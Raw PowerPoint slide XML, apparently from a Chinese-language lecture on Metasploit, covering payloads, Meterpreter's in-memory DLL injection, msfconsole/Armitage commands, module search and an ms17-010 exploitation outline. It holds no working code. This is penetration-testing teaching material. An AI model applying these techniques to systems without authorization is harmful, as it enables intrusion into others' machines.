              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>相当于弹头。</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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3175826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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>stage payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Metasploit Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>是一种后渗透工具，它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>。这种工具是基于“内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>注入”理念实现的，它能够通过创建一个新进程并调用注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>来让目标系统运行注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>文件。</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a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3253574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那么目前流行的用户接口主要是有这三个和</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cli,</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还有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msf</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 console</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，那么这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>armitage</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最常用的就是</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs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那么如果你对每一个命令都要都很熟悉的时候，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msfcli</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会提高你的工作效率。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一款</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>编写的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>图形界面化的攻击软件。</a:t>
            </a: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sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9512569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操作之前，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以通过</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连接它的后台的数据库，一些扫描和攻击的结果存储到数据库中。当然这个数据库并不是必需</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs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zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="等线"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800" dirty="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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23482494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dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>我们确定了某一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>之后，我们想使用它的话，我们要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的命令，然后后边跟上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的全名称。如果我们想想返回到上一级上下文中，我们可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25989925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cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Microsoft Verified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>has app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>exploitDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤已验证过的和容易攻击的应用程序渗透测试模块</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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1792232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u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>由于漏洞成千上万，这时可以借助一些便捷的工具来实施，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>实现漏洞扫描。</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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="12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20060129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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19290279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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26145539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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4041038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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9964959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effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24784552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Required yes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示必填项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18916925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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>他的功能是在你攻破对方的电脑时我们获取到了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40293915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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9982295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ts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>个典型漏洞利用：蓝屏，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ms17-010, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>软件监听，网址监听</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
